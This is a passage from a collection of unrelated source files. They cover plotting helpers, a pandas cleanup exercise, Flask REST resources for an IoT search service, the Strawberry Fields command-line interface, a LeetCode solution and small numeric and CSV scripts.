y) = find_biggest(s)\n if location == None:\n location = (x * Decimal('0.9'), y * Decimal('1.1'))\n\n annotate(axis, y, (x, y), location)\n\ndef plot(s, x_label='', y_label='', y_lim=(), title=''):\n fig, ax1 = plt.subplots()\n ax1.plot(s, 'b')\n ax1.set_ylabel(y_label, color='b')\n ax1.set_ylim(y_lim)\n ax1.set_xlabel(x_label)\n\n for tl in ax1.get_yticklabels():\n tl.set_color('b')\n\n plt.title(title)\n plt.show()\n\ndef plot_two(s1, s2, s1_title='', s2_title='', x_label='', title='', y_lim=()):\n fig, ax1 = plt.subplots()\n ax1.plot(s1, 'b')\n ax1.set_ylabel(s1_title, color='b')\n ax1.set_xlabel(x_label)\n ax1.set_ylim(y_lim)\n for tl in ax1.get_yticklabels():\n tl.set_color('b')\n\n format_axis_labels_with_commas(ax1.get_yaxis())\n\n ax2 = ax1.twinx()\n ax2.plot(s2, 'g')\n ax2.set_ylabel(s2_title, color='g')\n ax2.set_ylim(y_lim)\n for tl in ax2.get_yticklabels():\n tl.set_color('g')\n format_axis_labels_with_commas(ax2.get_yaxis())\n\n plt.xlabel(x_label)\n plt.title(title)\n plt.show()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"31366470","text":"# %% Result\n\n# %% Tasks\n'''\nLet's tidy up our dataset by:\n\n1. Dropping unnecessary columns (i.e.'Unnamed: 0')\n2. Replacing the majors with full names:\n1. Replacing 'M' and 'F' with thier full form.\n\n | Before | After |\n | :----: | :----------- |\n | PHY | Physics |\n | CHM | Chemistry |\n | LS | Life Sciences |\n | CBIO' | Comp. Biology |\n'''\n\n# %% Solution\nfrom sys import argv # Hide\n\nimport pandas as pd # Hide\n\ndf = pd.read_excel('./files/dummy_class.xls') # Hide\n\nmy_to_replace = {\n 'PHY': 'Physics',\n 'CHM': 'Chemistry',\n 'LS': 'Life Sciences',\n 'CBIO': 'Comp. Biology',\n 'F': 'Female',\n 'M': 'Male'\n}\n\n# What does inplace do?\ndf.replace(to_replace=my_to_replace, inplace=True)\n\n# Now lets drop the unnecessary columns\nmy_to_drop = 'Unnamed: 0'\ndf.drop(columns=my_to_drop, inplace=True)\n\nwith open(f'{argv[0]}.html', 'w') as file: # Hide\n file.write(df.head(10).to_html()) # Hide\n","sub_path":"files_python/dummy-class_housekeeping-02.py","file_name":"dummy-class_housekeeping-02.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"9155070","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 4 12:33:00 2018\n\n@author: nguyentran\n\"\"\"\n\nfrom flask import Flask, request, abort\nfrom flask_restful import Resource, Api, abort, reqparse\nimport json\nimport yaml\nfrom ISEPLib.abstract_services import *\nimport requests\nimport re\n\nimport ISEPLib.message as message\nimport ISEPLib.entity as entity\nimport ISEPLib.rest_endpoints as rest_endpoints\n\nclass AbsResource(Resource):\n def __init__(self, service = None, self_host_post = \"\", rest_endpoint = \"\", *args, **kwargs):\n self.service = service\n self.rest_endpoint = rest_endpoint\n self.self_host_port = self_host_post\n \n #==========================================================================\n # utilities \n #==========================================================================\n def create_parser(self, *args): \n # Create a parser for form data submitted by clients via POST or PUT\n parser = reqparse.RequestParser()\n # Configure the parser to look for certain argument in the submitted data\n # Submitted data can be considered a dictionary with argument : value pairs\n # This is an argument\n for arg in args:\n # Indicate that this API expects an argument named task in the submitted data\n # After parsing, we can be sure the given argument exists and the data is safe\n parser.add_argument(arg)\n return parser\n \n def extract_from_payload(self, key, payload_key = \"payload\"):\n parser = self.create_parser(payload_key)\n args = parser.parse_args()\n \n with open(\"simple_service_log.txt\", \"w\") as file:\n file.write(str(request.values))\n # file.write(str(messages.CollectorPostResMessage(request.url, \n # \"timestamp-id of the collected set of IoT content\", \n # contentURL).to_dict()))\n \n value = yaml.load(args[payload_key])[key]\n return value\n \n def extract_callback_url(self):\n \"\"\"\n This method checks whether the given message is a callback message\n If it is the case, then extract the call back URL and return\n Otherwise, return \"not_callback\"\n \"\"\"\n parser = self.create_parser(\"type\")\n args = parser.parse_args()\n \n mes_type = args[\"type\"]\n if mes_type == \"callback_message\":\n callback_url = self.extract_from_payload(\"url\")\n return callback_url\n else:\n return \"not_callback\"\n \n def extract_from_cookies(self, key = \"\"):\n value = request.cookies.get(key)\n return value\n \n def extract_workflow_id(self, wf_id = \"wf_id\", abort_req = False):\n \"\"\"\n Extract workflow id from the cookie sent to this service\n \"\"\"\n workflow_id = self.extract_from_cookies(key = wf_id)\n if workflow_id and type(workflow_id) is str:\n # If workflow id is available as a string, return as is\n return workflow_id\n else:\n if abort_req:\n # If abort flag is set, return error code and stop processing the request\n abort(400)\n else:\n # otherwise, return an empty string\n return \"\"\n \n def get_iot_contents(self, workflow_id = \"\"):\n \"\"\"\n This utility helps getting iot contents, either from the received request,\n or from the callback url available in the request\n \"\"\"\n callback_url = self.extract_callback_url()\n iot_contents = []\n if callback_url != \"not_callback\":\n \"\"\"\n If the input message is a call back, send a request to \n the callback link to get needed data\n \"\"\"\n \n r = requests.get(callback_url, cookies = {\"wf_id\" : workflow_id})\n \n result = r.json()\n \n iot_content_dicts = result[\"payload\"][\"iot_contents\"]\n else:\n \"\"\"\n Otherwise, extract iot_contents from the request\n \"\"\"\n iot_content_dicts = self.extract_from_payload(\"iot_contents\")\n \n \n for iot_content_dict in iot_content_dicts:\n iot_contents.append(entity.IoTContent(iot_content_dict = iot_content_dict))\n \n return iot_contents\n \n def get_result_set(self, workflow_id = \"\"):\n \"\"\"\n This utility helps getting a result set, either from the received request,\n or from the callback url available in the request\n \"\"\"\n callback_url = self.extract_callback_url()\n result_set = None\n if callback_url != \"not_callback\":\n \"\"\"\n If the input message is a call back, send a request to \n the callback link to get needed data\n \"\"\"\n \n r = requests.get(callback_url, cookies = {\"wf_id\" : workflow_id})\n \n result = r.json()\n \n result_set = result[\"payload\"][\"result_set\"]\n else:\n \"\"\"\n Otherwise, extract iot_contents from the request\n \"\"\"\n result_set = self.extract_from_payload(\"result_set\")\n \n \n return entity.ResultSet(result_set_dict=result_set)\n \n def generate_host_port_endpoint(self, endpoint = None):\n \"\"\"\n This utility remove from endpoint, and create\n a complete URL pointing to a resource from host_port and endpoint\n \n if endpoint is not given, this function returns URL pointing to self\n \"\"\"\n if endpoint is None:\n endpoint = self.rest_endpoint\n endpoint_proc = re.sub(r\"<.*?>\", \"\", endpoint)\n url = \"%s%s\" % (self.self_host_port, endpoint_proc)\n \"\"\"\n Remove trailing /\n \"\"\"\n url = re.sub(r\"\\/$\", \"\", url)\n return url\n \n \n\n#==================================\n# /api/new-cont-ids\n#==================================\nclass NewResIDsPost(AbsResource):\n \"\"\"\n This resource is served by detector services.\n POST request to this resource starts the detection.\n Input: IoT Content entity (directly or via callback)\n Output: Callback message\n \"\"\" \n def post(self):\n \"\"\"\n Get workflow id and inputs\n \"\"\"\n workflow_id = self.extract_workflow_id()\n \n iot_contents = None\n try:\n iot_contents = self.get_iot_contents(workflow_id=workflow_id)\n except:\n \"\"\"\n Do not abort the operation immediately because source detector does not\n need iot-content to work. Therefore, I leave the decision to \n deal with non existence of iot content to the service implementation\n \"\"\"\n print(\"Cannot find the iot content in either the message or at the call back\")\n pass\n \n \"\"\"\n Process and generate outputs\n \"\"\"\n req_id = self.service.detect(iot_contents = iot_contents, wf_id = workflow_id)\n if req_id is None:\n \"\"\"\n If we get a None request from the service, I assume that the client request is incorrect\n \"\"\"\n abort(400)\n req_id = \"%s/%s\" % (self.generate_host_port_endpoint(), req_id)\n msg = message.CallbackMessage(request.url, \"Invoked discovery process. Poll the returned URL for results.\", req_id, workflow_id = workflow_id)\n return msg.to_dict(), 201\n\n#==================================\n# /api/new-cont-ids/\n#==================================\nclass NewResIDsGet(AbsResource):\n \"\"\"\n This resource is served by detector services\n GET a list of resource IDs by a given key, which was generated by POST\n Input: N/A\n Output: IoT Content list message\n \"\"\"\n def get(self, req_id):\n \"\"\"\n Get workflow id and input key\n \"\"\"\n workflow_id = self.extract_workflow_id()\n if req_id is None:\n abort(404)\n \n \"\"\"\n Retrieve data and return \n \"\"\"\n res_ids = self.service.get_detect_result(req_id = req_id, wf_id = workflow_id)\n if res_ids is None:\n \"\"\"\n If return from service is None, it means the given req_id is not available on this server\n \"\"\"\n print(\"Resource %s does not exist.\" % req_id)\n abort(404)\n msg = message.IoTContentsMessage(request.url, \"List of detected content id\", res_ids, workflow_id = workflow_id) \n return msg.to_dict()\n\n\n\n\n#==================================\n# /api/res-contents\n#==================================\nclass ResContentsPost(AbsResource):\n \"\"\"\n This resource is served by collector services\n \"\"\"\n def post(self):\n \"\"\"\n Endpoint: /api/res-contents\n \n POST request to this resource invoke the collection process for IoT content\n at the given identifiers. Content is timestamped and store.\n Every new POST request replaces the previous timestamp with a newer one\n \"\"\"\n workflow_id = self.extract_workflow_id()\n\n # Get IoT content either directly from the message, or via call back \n iot_contents = self.get_iot_contents(workflow_id=workflow_id)\n \n req_id = self.service.collect(iot_contents, request.host, wf_id = workflow_id)\n req_id = \"%s/%s\" % (self.generate_host_port_endpoint(), req_id)\n \n msg = message.CallbackMessage(request.url, \"Invoked collection process. Poll the returned URL for results.\", req_id, workflow_id = workflow_id)\n return msg.to_dict() , 201\n\n#==================================\n# /api/res-contents/\n#==================================\nclass ResContentsGet(AbsResource):\n \"\"\"\n This resource is served by collector services\n \"\"\"\n def get(self, req_id):\n workflow_id = self.extract_workflow_id()\n# with open(\"test_cookie.txt\", \"a\") as f:\n# f.write(\"From ResContent: %s\\n\" % workflow_id)\n \n contents = self.service.lookup(req_id, wf_id = workflow_id)\n msg = message.IoTContentsMessage(request.url, \"List of IoT content at the given req_id\", contents, workflow_id = workflow_id)\n return msg.to_dict()\n\n\n\n\n#==================================\n# /api/iot-contents\n#==================================\nclass Contents(AbsResource):\n \"\"\"\n This resource is served by IoT resource storage\n \"\"\"\n def post(self):\n \n workflow_id = self.extract_workflow_id()\n \n # Get IoT content either directly from the message, or via call back \n iot_contents = self.get_iot_contents(workflow_id=workflow_id)\n \n# # Get the url of data to retrieve\n# res_contents_url = self.extract_from_payload(\"res_contents_url\")\n \n # Get content from URl and add to the database\n self.service.insert(iot_contents, wf_id = workflow_id)\n \n url = self.generate_host_port_endpoint()\n msg = message.CallbackMessage(request.url, \"Stored IoT content. Poll the returned URL for getting all stored IoT content.\", url, workflow_id = workflow_id)\n \n return msg.to_dict(), 201 \n \n#class Res(AbsResource):\n# \"\"\"\n# This resource is served by IoT resource storage. It represents individual \n# resource item\n# \"\"\"\n# def get(self, res_id):\n# \"\"\"\n# GET request to this resource returns an individual resource item in\n# the storage\n# \"\"\"\n# workflow_id = self.extract_workflow_id()\n## with open(\"test_cookie.txt\", \"a\") as f:\n## f.write(\"From Res: %s\\n\" % workflow_id)\n# \n# return {\"res\" : self.service.getSingleResource(res_id, wf_id = workflow_id)}\n\n\n\n\n#==================================\n# /api/queries\n#==================================\nclass Queries(AbsResource):\n \"\"\"\n Served by a searcher service. It represents the set of all queries handled \n by a searcher service\n \"\"\"\n \n def post(self):\n \"\"\"\n POST request to this resource sends a query and invoke the search process\n It returns URL of the newly created result resource corresponding to the incoming query\n \"\"\"\n workflow_id = self.extract_workflow_id() \n query = self.extract_from_payload(\"query\")\n query = entity.Query(query_dict=query)\n query_id = self.service.query(query, wf_id = workflow_id)\n result_url = \"%s/%s\" % (self.generate_host_port_endpoint(endpoint = rest_endpoints.results), query_id)\n msg = message.CallbackMessage(request.url, \"Finished query. Find the result at the included URL\", result_url, workflow_id = workflow_id)\n return msg.to_dict() , 201\n \n#==================================\n# /api/results\n#==================================\nclass Result(AbsResource):\n \"\"\"\n Served by a searcher service. It represents the set of all results generated\n by a searcher service\n \"\"\"\n def get(self, query_id):\n \"\"\"\n GET request to this resource returns an individual resource item in\n the storage\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.service.getResult(query_id, wf_id = workflow_id)\n msg = message.ResultSetMessage(request.url, \"Results\", result_set, workflow_id = workflow_id)\n return msg.to_dict()\n \n\n#==================================\n# /api/results\n#==================================\nclass AggregatorResultsPost(AbsResource):\n \"\"\"\n Served by an aggregator service. It represents the set of all lists of search results\n submitted to the aggregator for aggregation\n \"\"\"\n def post(self):\n \"\"\"\n POST request to this resource sends a result URL and invoke the store process\n It returns URL to /api/results/ to retrieve aggregated results\n \n Expect a message in the format of SearcherPostQueryMessage\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.get_result_set(workflow_id=workflow_id)\n query_id = self.service.store(result_set, wf_id = workflow_id)\n aggregated_result_url = \"%s/%s\" % (self.generate_host_port_endpoint(), query_id)\n msg = message.CallbackMessage(request.url, \"Added result URL for the query %s. Find the result at the included URL\" % (workflow_id), aggregated_result_url, workflow_id = workflow_id)\n return msg.to_dict() , 201\n \n#==================================\n# /api/results/\n#==================================\nclass AggregatorResultsGet(AbsResource):\n \"\"\"\n Served by a searcher service. It represents the set of all results generated\n by a searcher service\n \"\"\"\n def get(self, query_id):\n \"\"\"\n GET request to this resource returns an individual resource item in\n the storage\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.service.aggregate(query_id, wf_id = workflow_id)\n if type(result_set) is not entity.ResultSet:\n abort(404)\n msg = message.ResultSetMessage(request.url, \"Aggregated Search Results\", result_set, workflow_id = workflow_id)\n return msg.to_dict()\n \n \n#==================================\n# /queries\n#==================================\nclass FacadeQueries(AbsResource):\n \"\"\"\n Served by a facade service. It provides the entry point to the system for \n search clients\n \"\"\"\n def post(self):\n \"\"\"\n POST request to this resource sends a query and invoke the search process\n It returns URL of the newly created result resource corresponding to the incoming query\n \"\"\"\n query_content = request.get_json(force=True)\n query_id, workflow_id = self.service.query(query_content)\n result_url = \"%s/%s\" % (self.generate_host_port_endpoint(endpoint = rest_endpoints.facade_results_get), query_id)\n msg = message.CallbackMessage(request.url, \"Finished query. Find the result at the included URL\", result_url, workflow_id = workflow_id)\n\n return msg.to_dict() , 201\n \n#==================================\n# /results/\n#==================================\nclass FacadeResultGet(AbsResource):\n \"\"\"\n Served by a facade service. It provides and endpoint for search clients\n to retrieve the status of their submitted queries\n \"\"\"\n def get(self, query_id):\n \"\"\"\n GET request to this resource check the current state of the given query\n and return the url of the server holding result list if it is available\n \"\"\"\n workflow_id = self.extract_workflow_id() \n result_set = self.service.getResult(query_id, wf_id = workflow_id)\n msg = None\n if type(result_set) is not entity.ResultSet:\n result_url = \"%s/%s\" % (self.generate_host_port_endpoint(), query_id)\n msg = message.CallbackMessage(request.url, \"Result is not available. Please check again later.\", result_url, workflow_id = workflow_id)\n else:\n msg = message.ResultSetMessage(request.url, \"Results\", result_set, workflow_id = workflow_id)\n return msg.to_dict()\n \n#==================================\n# /results\n#==================================\nclass FacadeResultPost(AbsResource):\n \"\"\"\n Served by a facade service. This endpoint accepts updates from other services\n to update the state of a query under processing\n \"\"\"\n def post(self):\n \"\"\"\n POST request to this resource to update the URL pointing to the result list\n of a processing query\n \"\"\"\n workflow_id = self.extract_workflow_id()\n result_set = self.get_result_set(workflow_id=workflow_id)\n query_id = result_set.query_ID\n self.service.updateResult(query_id, result_set)\n result_url = \"%s/%s\" % (self.generate_host_port_endpoint(), query_id)\n msg = message.CallbackMessage(request.url, \"Updated results of query %s\" % query_id, result_url, workflow_id = workflow_id)\n return msg.to_dict(), 201","sub_path":"component_services/metadata_collector_service/ISEPLib/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":18194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164534591","text":"__author__ = 'David'\r\n\r\nclass Node:\r\n def __init__(self, item = None, link = None): # set default values = None\r\n self.item = item\r\n self.next = link\r\n\r\n # print node, must return a string\r\n def __str__(self):\r\n return str(self.item)\r\n\r\n def print_structure(self,node):\r\n while node is not None:\r\n print(node, end =\" \")\r\n node = node.next\r\n print()\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n need to have nodes from end to start\r\n end: n1\r\n stuff: n2 | links to n1\r\n stuff: n3 | links to n2\r\n start: n4 | links to n3\r\n due to links n3 has to be defined before n4 for n4 to link to n3\r\n '''\r\n\r\n n1 = Node(\"structure\")\r\n n5 = Node(\"a linked\", n1)\r\n n2 = Node(\"is\", n5)\r\n n3 = Node(\"this\", n2)\r\n n4 = Node(\"Hello\", n3)\r\n\r\n # prints all \"Hello this is a linked structure\"\r\n n1.print_structure(n4)\r\n # prints hello\r\n print(n4)\r\n # prints a linked\r\n print(n5)","sub_path":"FIT1008-Intro-To-Computer-Science/Pracs/26029391_Prac8/Class_node.py","file_name":"Class_node.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596472930","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n@author: samyf\n\"\"\"\nimport numpy as np\nfrom scipy import linalg\nimport math\n\ndef matrizFunciones(x,y):\n f1=-x**2-y**2+1\n f2=y-x\n return np.array([f1,f2])\n \ndef Jacobiano(x,y):\n return np.array([[2*x, 2*y],[-1 , 1]])\n\n\n\nx=1 #valor inicial de x\ny=1 #valor inicial de y \ntolerancia=10**-8\nn=10 #numero de iteraciones que se deben hacer \nk=0\nsolucionAnterior=[x,y]\ndispercion=1\n\nwhile k < n or dispercion > tolerancia:\n \n print(\"iteracion \",k,\":\", solucionAnterior)\n J=Jacobiano(solucionAnterior[0], solucionAnterior[1])\n b=matrizFunciones(solucionAnterior[0], solucionAnterior[1])\n\n\n solucion= linalg.solve(J, b)\n\n solucionActual=solucionAnterior[0] +solucion[0],solucionAnterior[1] +solucion[1] \n solucionAnterior=solucionActual\n \n k=k+1\n dispercion= abs(math.sqrt((solucionActual[0]-solucionAnterior[0])**2 + (solucionActual[1]-solucionAnterior[1])**2 ))\n \n\n\nprint(\"iteracion \",k,\":\", solucionAnterior)\n\n\n\n","sub_path":"Talleres/Taller 2/SPOILER_implementacion_metodo_newton_multivariado.py","file_name":"SPOILER_implementacion_metodo_newton_multivariado.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"448464025","text":"# Copyright 2019-2020 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"A standalone command-line interface for configuring Strawberry Fields and connecting\nto the Xanadu cloud platform.\n\"\"\"\n\nimport argparse\nimport sys\n\nfrom strawberryfields.api import Connection\nfrom strawberryfields.configuration import ConfigurationError, create_config, store_account\nfrom strawberryfields.engine import RemoteEngine\nfrom strawberryfields.io import load\n\n\ndef main():\n \"\"\"The Xanadu cloud platform command line interface.\n\n **Example:**\n\n The following is a simple example on getting the help message of the cloud platform command\n line interface. It details each of the options available.\n\n .. code-block:: console\n\n $ sf\n usage: sf [-h] [--ping] {configure,run} ...\n\n See below for available options and commands for working with the Xanadu cloud platform.\n\n General Options:\n -h, --help show this help message and exit\n --ping, -p Tests the connection to the remote backend.\n\n Commands:\n {configure,run}\n configure Configure each detail of the API connection.\n run Run a blackbird script.\n \"\"\"\n parser = create_parser()\n args = parser.parse_args()\n\n if args.ping:\n ping()\n elif hasattr(args, \"func\"):\n args.func(args)\n else:\n parser.print_help()\n\n\ndef create_parser():\n \"\"\"Creates a parser to process the commands and arguments passed to the\n command line interface.\n\n Returns:\n ArgumentParser: an argument parser object that defines the related\n options\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"See below for available options and commands for working with the Xanadu cloud platform.\"\n )\n\n # Setting a title for the general options (requires setting a private\n # attribute)\n parser._optionals.title = \"General Options\"\n\n # Adding the pinging general option\n parser.add_argument(\n \"--ping\", \"-p\", action=\"store_true\", help=\"Tests the connection to the remote backend.\"\n )\n\n # Adding subparsers configure and input\n subparsers = parser.add_subparsers(title=\"Commands\")\n\n # Adding the configure subparser\n configure_parser = subparsers.add_parser(\n \"configure\", help=\"Configure each detail of the API connection.\"\n )\n configure_parser.set_defaults(func=configure)\n\n configure_parser.add_argument(\n \"--token\",\n \"-t\",\n type=str,\n help=\"Configure Strawberry Fields with your Xanadu cloud platform API token.\",\n )\n configure_parser.add_argument(\n \"--local\",\n \"-l\",\n action=\"store_true\",\n help=\"Create a local configuration file in the current directory.\",\n )\n\n # Adding the input subparser\n run_parser = subparsers.add_parser(\"run\", help=\"Run a blackbird script.\")\n run_parser.add_argument(\n \"input\", type=str, help=\"The filename or path to the blackbird script to run.\"\n )\n run_parser.set_defaults(func=run_blackbird_script)\n run_parser.add_argument(\n \"--output\",\n \"-o\",\n help=\"Path to the output file, where the results of the program will be written (stdout by default).\",\n )\n\n return parser\n\n\ndef configure(args):\n r\"\"\"An auxiliary function for configuring the API connection to the Xanadu\n cloud platform.\n\n Can be used to simply save the authentication token with default\n configuration options. Alternatively, a wizard is provided for full\n configurability.\n\n See more details regarding Strawberry Fields configuration and available\n configuration options on the :doc:`/code/sf_configuration` page.\n\n Args:\n args (ArgumentParser): arguments that were specified on the command\n line stored as attributes in an argument parser object\n \"\"\"\n if args.token:\n kwargs = {\"authentication_token\": args.token}\n else:\n kwargs = configuration_wizard()\n\n if args.local:\n store_account(**kwargs, location=\"local\")\n else:\n store_account(**kwargs)\n\n\ndef ping():\n \"\"\"Tests the connection to the remote backend.\"\"\"\n if Connection().ping():\n sys.stdout.write(\"You have successfully authenticated to the platform!\\n\")\n else:\n sys.stdout.write(\"There was a problem when authenticating to the platform!\\n\")\n\n\ndef configuration_wizard():\n r\"\"\"Provides an interactive selection wizard on the command line to\n configure every option for the API connection.\n\n Default configuration options are provided as defaults to the user.\n Configuration options are detailed in :doc:`/code/sf_configuration`.\n\n Returns:\n dict[str, Union[str, bool, int]]: the configuration options\n \"\"\"\n default_config = create_config()[\"api\"]\n\n # Getting default values that can be used for as messages when getting inputs\n hostname_default = default_config[\"hostname\"]\n ssl_default = \"y\" if default_config[\"use_ssl\"] else \"n\"\n port_default = default_config[\"port\"]\n\n authentication_token = input(\n \"Please enter the authentication token to use when connecting: [] \"\n )\n\n if not authentication_token:\n sys.stdout.write(\"No authentication token was provided, please configure again.\")\n sys.exit()\n\n hostname = (\n input(\n \"Please enter the hostname of the server to connect to: [{}] \".format(hostname_default)\n )\n or hostname_default\n )\n\n ssl_input = (\n input(\"Should the client attempt to connect over SSL? [{}] \".format(ssl_default))\n or ssl_default\n )\n use_ssl = ssl_input.upper() == \"Y\"\n\n port = (\n input(\"Please enter the port number to connect with: [{}] \".format(port_default))\n or port_default\n )\n\n kwargs = {\n \"authentication_token\": authentication_token,\n \"hostname\": hostname,\n \"use_ssl\": use_ssl,\n \"port\": port,\n }\n return kwargs\n\n\ndef run_blackbird_script(args):\n \"\"\"Run a blackbird script.\n\n Related arguments:\n * input: the input blackbird script to be run\n * output: the output file to store the results in (optional)\n\n Args:\n args (ArgumentParser): arguments that were specified on the command\n line stored as attributes in an argument parser object\n \"\"\"\n try:\n program = load(args.input)\n except FileNotFoundError:\n sys.stdout.write(\"The {} blackbird script was not found.\".format(args.input))\n sys.exit()\n\n eng = RemoteEngine(program.target)\n\n sys.stdout.write(\"Executing program on remote hardware...\\n\")\n result = eng.run(program)\n\n if result and result.samples is not None:\n write_script_results(result.samples, output_file=args.output)\n else:\n sys.stdout.write(\n \"Ooops! Something went wrong with obtaining the results. Please check the Blackbird script specified and the connection to the remote engine.\"\n )\n sys.exit()\n\n\ndef write_script_results(samples, output_file=None):\n \"\"\"Write the results of the script either to a file or to the standard output.\n\n Args:\n samples (array[float]): array of samples\n output_file (str or None): the path to the output file, None if no output was defined\n \"\"\"\n if output_file:\n with open(output_file, \"w\") as file:\n file.write(str(samples))\n else:\n sys.stdout.write(str(samples))\n","sub_path":"strawberryfields/cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353883412","text":"#\n# [966] Binary Subarrays With Sum\n#\n# https://leetcode.com/problems/binary-subarrays-with-sum/description/\n#\n# algorithms\n# Medium (25.28%)\n# Total Accepted: 1.4K\n# Total Submissions: 5.5K\n# Testcase Example: '[1,0,1,0,1]\\n2'\n#\n# In an array A of 0s and 1s, how many non-empty subarrays have sum S?\n#\n#\n#\n# Example 1:\n#\n#\n# Input: A = [1,0,1,0,1], S = 2\n# Output: 4\n# Explanation:\n# The 4 subarrays are bolded below:\n# [1,0,1,0,1]\n# [1,0,1,0,1]\n# [1,0,1,0,1]\n# [1,0,1,0,1]\n#\n#\n#\n#\n# Note:\n#\n#\n# A.length <= 30000\n# 0 <= S <= A.length\n# A[i] is either 0 or 1.\n#\n#\n#\n\n\nclass Solution:\n def numSubarraysWithSum(self, A, S):\n \"\"\"\n :type A: List[int]\n :type S: int\n :rtype: int\n \"\"\"\n if not A:\n return 0\n # count each sum, and cal the final res\n cursum = 0\n d = {}\n for a in A:\n cursum += a\n if cursum not in d:\n d[cursum] = 0\n d[cursum] += 1\n res = 0\n # NOTE: if S == 0, then need to find the continous 0 count n (d[0] or d[i]-1) and res+=n*(n+1)//2\n if S == 0:\n for k in d:\n if k == 0:\n zeros = d[k]\n else:\n zeros = d[k] - 1\n res += zeros*(zeros+1)//2\n else:\n for k in d:\n if k == S:\n res += d[k]\n if k + S in d:\n # NOTE: here is d[k] * d[k + S], instead of d[k+1] * d[k + S], because the start index sub array is from [ki+1, (k+1)i]\n res += d[k] * d[k + S]\n return res\n\n\ndef main():\n print(Solution().numSubarraysWithSum([0, 0, 0, 0, 0], 0))\n print(Solution().numSubarraysWithSum([1, 1, 0, 1], 2))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Medium/930.binary-subarrays-with-sum.python3.py","file_name":"930.binary-subarrays-with-sum.python3.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"341575346","text":"import os\nimport csv\nfrom decimal import Decimal\npath = '/Users/ronald/Desktop/'\ndef main():\n for file in os.listdir(path):\n if 'case3' in file:\n with open('/Users/ronald/Desktop/' + file, 'r') as fil:\n f_reader = csv.reader(fil)\n # print(type(f_reader))\n data = [row for row in f_reader]\n # print(data)\n # for data1 in data:\n for i in range(1,len(data)):\n data[i][1] = float(data[i][1])\n data2 = [data.pop(0)]\n data1 = sorted(data,key = lambda s: s[1],reverse=True)\n data2.extend(data1)\n # print(data2)\n # a=[]\n b = []\n for i in range(len(data2)):\n # print(data[i][2])\n if '产品经理-顺丰-不合适' in data2[i][2] or '产品经理-顺丰-合适' in data2[i][2]:\n # print('1')\n # print(data2[i][2])\n b.append(data2[i])\n # print(b)\n c = []\n for i in range(len(data2)):\n # print(data[i][2])\n if '产品经理-顺丰-一般合适' in data2[i][2] or '产品经理-顺丰-非常合适' in data2[i][2]:\n # print('1')\n # print(data2[i][2])\n c.append(data2[i])\n # print(c)\n d = []\n for i in range(len(data2)):\n # print(data[i][2])\n if '产品经理-顺丰-一般合适' in data2[i][2] or '产品经理-顺丰-非常合适' in data2[i][2] or '产品经理-顺丰-不合适' in data2[i][2] or '产品经理-顺丰-合适' in data2[i][2]:\n # print('1')\n # print(data2[i][2])\n d.append(data2[i])\n # print(c)\n # d = b + c\n # print(d)\n return b,data2,c,d\n\ndef top(n):\n j=0\n # c = []\n for i in range(n):\n if '产品经理-顺丰-合适' in b[i][2]:\n # c.append(b[i])\n j+=1\n return str(j)\ndef top1(n):\n j=0\n # c = []\n for i in range(n):\n if '产品经理-顺丰-非常合适' in c[i][2]:\n # c.append(b[i])\n j+=1\n return str(j)\ndef top2(n):\n j = 0\n for i in range(n + 1):\n if '产品经理-顺丰-合适' in data2[i][2] or '产品经理-顺丰-非常合适' in data2[i][2]:\n j += 1\n return str(j)\ndef top3(n):\n j = 0\n for i in range(n):\n # print(d[i][2])\n if '产品经理-顺丰-合适' in d[i][2] or '产品经理-顺丰-非常合适' in d[i][2]:\n # print(d[i][2])\n j += 1\n return str(j)\nif __name__ == '__main__':\n b,data2,c,d = main()\n\n f = open('/Users/ronald/Desktop/chanpin.txt', 'a')\n # j = top(n)\n f.write('pure'+'\\n')\n # f.write(j+'\\n')\n for i in range(len(b)):\n b[i][1] = str(b[i][1])\n\n for i in range(len(b)):\n f.write(' '.join(b[i])+'\\n')\n f.write('合适占合适与不合适比例' + '\\n')\n j = top(3)\n # print(j)\n f.write('top3'+' = ' + str(Decimal(int(j)/3).quantize(Decimal('0.00')))+'\\n')\n j = top(5)\n # print(j)\n f.write('top5' + ' = ' + str(Decimal(int(j)/5).quantize(Decimal('0.00')))+'\\n')\n j = top(10)\n f.write('top10' + ' = ' + str(Decimal(int(j)/10).quantize(Decimal('0.00')))+'\\n')\n if len(b) > 15:\n j = top(15)\n f.write('top15' + ' = ' + str(Decimal(int(j)/15).quantize(Decimal('0.00')))+'\\n')\n if len(b) > 25:\n j = top(25)\n f.write('top25' + ' = ' + str(Decimal(int(j)/25).quantize(Decimal('0.00')))+'\\n')\n f.write('非常合适占非常合适与一般合适比例' + '\\n')\n if len(c) > 3:\n j = top1(3)\n f.write('top3' + ' = ' + 